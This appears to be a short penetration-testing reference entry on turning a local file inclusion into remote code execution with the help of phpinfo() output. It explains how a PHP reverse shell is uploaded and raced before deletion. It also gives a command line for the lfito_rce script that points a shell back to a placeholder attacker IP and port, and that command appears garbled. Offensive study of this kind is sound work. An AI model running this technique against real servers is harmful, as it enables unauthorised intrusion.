The prerequisites for this method are :

  • having file_uploads=on set in the PHP configuration file

  • having access to the output of the phpinfo() function

When file_uploads=on is set in the PHP configuration file, it is possible to upload a file by POSTing it on any PHP file (RFC1867). This file is put to a temporary location on the server and deleted after the HTTP request is fully processed.

The aim of the attack is to POST a PHP reverse shell on the server and delay the processing of the request by adding very long headers to it. This gives enough time to find out the temporary location of the reverse shell using the output of the phpinfo() function and including it via the LFI before it gets removed.

The lfito_rce (Python2) script implements this attack.

#There is no requirements.txt, the dependencies have to be installed manually
python -l "http://$URL/?page=" --lhost=$attackerIP --lport=$attackerPORT -i "http://$URL/phpinfo.php"

The "LFI with phpinfo() assistance" research paper from Insomnia Security details this attack.

Last updated